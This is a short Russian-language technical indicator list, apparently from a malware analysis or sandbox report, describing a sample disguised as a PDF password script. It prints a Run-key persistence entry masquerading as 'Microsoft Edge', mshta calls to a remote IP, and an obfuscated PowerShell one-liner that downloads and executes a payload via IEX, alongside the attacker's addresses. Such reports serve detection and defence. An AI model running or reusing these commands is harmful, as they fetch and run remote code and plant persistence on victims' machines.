Техническая информация
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsoft Edge' = 'mshta vbscript:close(CreateObject("WScript.Shell").run("mshta http://171.22.28.214/o",0))'
- %APPDATA%\password for pdf.js
- '17#.#2.28.214':80
- http://17#.#2.28.214/o
- http://17#.#2.28.214/o/
- http://17#.#2.28.214/o/o.png
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\mshta.exe' http://171.22.28.214/o' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://171.22.28.214/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X' (со скрытым окном)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Password for PDF.js"
- '%WINDIR%\syswow64\mshta.exe' http://171.22.28.214/o
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://171.22.28.214/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X